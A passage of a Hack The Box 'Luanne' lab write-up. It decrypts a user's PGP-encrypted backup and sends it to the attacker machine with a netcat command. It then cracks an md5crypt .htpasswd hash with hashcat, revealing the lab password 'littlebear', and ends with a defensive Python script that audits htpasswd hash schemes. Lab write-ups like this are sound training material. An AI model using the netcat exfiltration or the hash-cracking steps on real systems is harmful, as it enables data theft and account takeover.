Backups


luanne$ ls -la
total 52
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 .
drwxr-xr-x  3 root        wheel   512 Sep 14  2020 ..
-rw-r--r--  1 r.michaels  users  1772 Feb 14  2020 .cshrc
drwx------  2 r.michaels  users   512 Sep 14  2020 .gnupg
-rw-r--r--  1 r.michaels  users   431 Feb 14  2020 .login
-rw-r--r--  1 r.michaels  users   265 Feb 14  2020 .logout
-rw-r--r--  1 r.michaels  users  1498 Feb 14  2020 .profile
-rw-r--r--  1 r.michaels  users   166 Feb 14  2020 .shrc
dr-x------  2 r.michaels  users   512 Sep 16  2020 .ssh
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 backups
dr-xr-x---  4 r.michaels  users   512 Sep 16  2020 devel
dr-x------  2 r.michaels  users   512 Sep 16  2020 public_html
-r--------  1 r.michaels  users    33 Sep 16  2020 user.txt

After moving laterally to the r.michaels user, I found an interesting directory in that user's home: /home/r.michaels/backups

luanne$ cd backups/ ; ls -la
total 12
dr-xr-xr-x  2 r.michaels  users   512 Nov 24  2020 .
dr-xr-x---  7 r.michaels  users   512 Sep 16  2020 ..
-r--------  1 r.michaels  users  1970 Nov 24  2020 devel_backup-2020-09-16.tar.gz.enc

Inside there is a single encrypted archive, which appears to be a backup of the weather application served on the 127.0.0.1:3001 socket.

PGP


luanne$ netpgp --decrypt ~/backups/devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz;
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
uid              RSA 2048-bit key <r.michaels@localhost>

For PGP encryption and decryption, NetBSD ships netpgp, the counterpart of GnuPG's gpg on Linux. Since the archive was encrypted to the r.michaels key (uid r.michaels@localhost) held in this user's own keyring, I can simply decrypt it as that user. I decrypted it and saved the result to the /tmp directory.

luanne$ ls -la /tmp
total 20
drwxrwxrwt   2 root        wheel    48 Mar 20 17:29 .
drwxr-xr-x  21 root        wheel   512 Sep 16  2020 ..
-rw-------   1 r.michaels  wheel  1639 Mar 20 17:29 devel_backup-2020-09-16.tar.gz

The decrypted archive is now available in the /tmp directory.

Archive


luanne$ nc 10.10.14.2 2222 < /tmp/devel_backup-2020-09-16.tar.gz
┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ nnc 2222 > devel_backup-2020-09-16.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.218] 65417

I then transfer it to Kali with nc for review.

┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ tar -xf devel_backup-2020-09-16.tar.gz
┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ tree -a devel-2020-09-16
devel-2020-09-16
├── webapi
│   └── weather.lua
└── www
    ├── .htpasswd
    └── index.html

3 directories, 3 files

After extracting the archive, I see a .htpasswd file once again. It is worth checking, since it could differ from the one found earlier.

┌──(kali㉿kali)-[~/…/htb/labs/luanne/devel]
└─$ cat devel-2020-09-16/www/.htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

This .htpasswd file is definitely not the same as the one I found in the /var/www directory earlier. I will get to cracking it right away.

Password Cracking


┌──(kali㉿kali)-[~/…/luanne/devel/devel-2020-09-16/www]
└─$ hashcat -a 0 -m 500 webapi_user2.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.:littlebear

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
Time.Started.....: Mon Mar 20 18:39:44 2023 (1 sec)
Time.Estimated...: Mon Mar 20 18:39:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    14326 H/s (12.70ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13056/14344385 (0.09%)
Rejected.........: 0/13056 (0.00%)
Restore.Point....: 12864/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: volkswagen -> ilove2
Hardware.Mon.#1..: Util: 90%

Started: Mon Mar 20 18:39:42 2023
Stopped: Mon Mar 20 18:39:47 2023

hashcat cracked the md5crypt hash almost immediately. The cracked password is littlebear.

I should check whether this password is reused elsewhere.
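As an added example that is not part of the original writeup: a small Python audit that parses an .htpasswd file, identifies each entry's hash scheme from its prefix, and flags the schemes that fall to a wordlist run like the one above in seconds (md5crypt, apr1, unsalted SHA-1, DES crypt) versus bcrypt. The sample file is constructed; only the webapi_user line is the one recovered from the backup.

```python
import re

# Constructed sample .htpasswd. The webapi_user line is the entry recovered from
# the backup above; the other two lines are made up to show the contrast.
SAMPLE_HTPASSWD = """\
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
legacy_user:{SHA}2jmj7l5rSw0yVb/vlWAYkK/YBwk=
modern_user:$2y$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
"""

# (prefix pattern, scheme name, acceptable?). Only bcrypt is slow by design;
# the MD5/SHA-1 based schemes are exactly what hashcat mode 500 and friends chew through.
SCHEMES = [
    (re.compile(r"^\$2[aby]\$\d\d\$"), "bcrypt", True),
    (re.compile(r"^\$apr1\$"), "apr1 (Apache MD5)", False),
    (re.compile(r"^\$1\$"), "md5crypt (hashcat mode 500)", False),
    (re.compile(r"^\{SHA\}"), "unsalted SHA-1", False),
]

def classify(hash_field):
    """Return (scheme name, acceptable) for one htpasswd hash field."""
    for pattern, name, ok in SCHEMES:
        if pattern.match(hash_field):
            return name, ok
    # Traditional DES crypt: 13 characters from the crypt alphabet, no prefix.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "traditional DES crypt", False
    return "unknown", False

def audit_htpasswd(text):
    """Parse htpasswd text and return one finding dict per non-comment entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep or not hash_field:
            findings.append({"line": lineno, "user": user, "scheme": "malformed", "weak": True})
            continue
        scheme, ok = classify(hash_field)
        findings.append({"line": lineno, "user": user, "scheme": scheme, "weak": not ok})
    return findings

if __name__ == "__main__":
    for f in audit_htpasswd(SAMPLE_HTPASSWD):
        print(f"{'WEAK' if f['weak'] else 'ok  '} line {f['line']}: {f['user']} uses {f['scheme']}")
```

Running it lists webapi_user and legacy_user as WEAK and modern_user as ok; the fix for the weak entries is to regenerate them with htpasswd -B so the file holds bcrypt hashes.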